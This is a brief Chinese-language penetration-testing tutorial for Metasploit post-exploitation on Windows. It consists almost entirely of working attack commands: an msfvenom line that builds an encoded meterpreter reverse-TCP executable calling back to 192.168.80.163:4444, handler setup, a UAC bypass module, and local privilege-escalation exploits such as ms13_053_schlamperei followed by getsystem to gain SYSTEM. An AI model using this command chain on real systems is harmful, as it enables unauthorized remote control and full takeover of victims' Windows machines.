首先建立一个session,进入后渗透测试阶段。
root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=4444 -b "\x00\xff" -i 7 -f exe -o /root/1.exe 首先生成一个meterpreter类型的payload
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.80.163
msf exploit(handler) > exploit
绕过UAC限制
exploit/windows/local/bypassuac 和 exploit/windows/local/bypassuac_injection
什么是UAC(用户账户控制)?,例如:
msf > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set payload windows/meterpreter/reverse_tcp
msf exploit(bypassuac) > set lhost 192.168.80.163
msf exploit(bypassuac) > set session 1
msf exploit(bypassuac) > exploit
meterpreter > getsystem 绕过UAC获取system权限
利用windows系统漏洞提权到system
exploit/windows/local/ms13_053_schlamperei
exploit/windows/local/ms13_081_track_popup_menu
exploit/windows/local/ms13_097_ie_registry_symlink
exploit/windows/local/ppr_flatten_rec
msf > use exploit/windows/local/ms13_053_schlamperei
msf exploit(ms13_053_schlamperei) > set session 1
msf exploit(ms13_053_schlamperei) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms13_053_schlamperei) > set lhost 192.168.80.163
msf exploit(ms13_053_schlamperei) > exploit
meterpreter > getsystem 提权到system用户
